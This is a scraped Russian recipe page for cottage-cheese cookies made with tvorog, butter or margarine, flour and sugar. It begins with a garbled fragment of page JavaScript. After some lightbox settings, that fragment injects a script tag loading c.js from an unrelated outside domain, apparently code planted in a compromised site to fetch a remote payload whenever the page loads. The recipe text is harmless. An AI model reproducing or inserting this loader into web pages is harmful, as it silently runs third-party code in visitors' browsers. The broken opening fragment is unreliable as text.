Творожное печенье , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Творожное печенье

Вкусное и полезное творожное печенье обладает удивительным свойством — оно нравится практически всем, ведь в состав выпечки входят только натуральные ингредиенты. Печенье можно кушать с чаем с компотом с како или просто как говорится «в сухомятку». Творожное печенье получается достаточно вкусным и полезным, его просто готовить в домашних условиях. Совмещение этих недорогих продуктов позволит насладится Вам и вашим близким вкусной домашней выпечкой. Все ингредиенты размягчить, смешать, 1/2 ч. ложки соды и погасить уксусом. Замесить тесто. Сделать из теста средние, не толстые лепешки. Каждую лепешку обволакивать в сахар, затем просто сложить по полам, еще в сахар и сложить треугольником. Выложить творожное печенье на противень и поставить выпекаться. Приятного Вам аппетита!
___________________________________________________________________________________________________________

Ингредиенты рецепта творожного печенья

1. творог 200 гр
2. масло (маргарин) 200 гр
3. мука 400 гр
4. сахар 100 гр

Другие рецепты:

Comments are closed.